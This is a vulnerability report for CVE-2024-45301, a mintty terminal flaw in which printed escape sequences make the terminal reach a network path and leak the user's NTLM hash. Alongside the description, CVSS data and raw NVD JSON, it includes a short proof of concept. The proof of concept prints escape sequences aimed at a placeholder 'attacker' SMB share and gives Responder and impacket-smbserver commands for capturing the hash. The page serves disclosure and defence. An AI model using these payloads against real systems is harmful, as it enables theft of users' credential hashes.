Security Vulnerability Report
CVE-2024-45301 CVSS 5.3 MEDIUM

CVE-2024-45301

Published: 2025-11-12 19:15:35
Last Modified: 2026-04-15 00:35:42

Description

Mintty is a terminal emulator for Cygwin, MSYS, and WSL. In versions 2.3.6 through 3.7.4, several escape sequences can cause the mintty process to access a file in a specific path. The access is triggered simply by printing the sequences in bash. An attacker can specify an arbitrary network path and negotiate an NTLM hash out of the victim's machine to an attacker-controlled remote host. An attacker can use password cracking tools or NetNTLMv2 hashes to Pass the Hash. Version 3.7.5 fixes the issue.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Mintty >= 2.3.6 and < 3.7.5
Mintty 2.3.6
Mintty 2.3.7
Mintty 2.3.8
Mintty 3.0.0 to 3.7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-45301 PoC - Mintty NetNTLM Hash Leakage
# Trigger via escape sequence with malicious UNC path
# Attacker setup: Run Responder or Impacket smbserver on attacker machine

# PoC escape sequence to trigger SMB connection:
evil_escape_seq = "\x1b]8;;\\\\attacker\\share\a"
print(evil_escape_seq)

# Alternative PoC - More explicit file access escape sequence:
# This sequence causes mintty to attempt file access at attacker-controlled path
poc_seq2 = "\033]8;;file:///\\\\attacker\\evil\\path\007"
print(poc_seq2)

# Note: Replace '\\\\attacker\\share' with actual attacker SMB server IP/hostname
# On attacker side, use Responder:
#   sudo python3 Responder.py -I eth0 -v
# Or use Impacket smbserver:
#   impacket-smbserver -smb2support share ./exploit_dir

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-45301", "sourceIdentifier": "[email protected]", "published": "2025-11-12T19:15:34.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mintty is a terminal emulator for Cygwin, MSYS, and WSL. In versions 2.3.6 through 3.7.4, several escape sequences can cause the mintty process to access a file in a specific path. It is triggered by simply printing them out on bash. An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host. An attacker can use password cracking tools or NetNTLMv2 hashes to Pass the Hash. Version 3.7.5 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://github.com/mintty/mintty/security/advisories/GHSA-jf4m-m6rv-p6c5", "source": "[email protected]"}]}}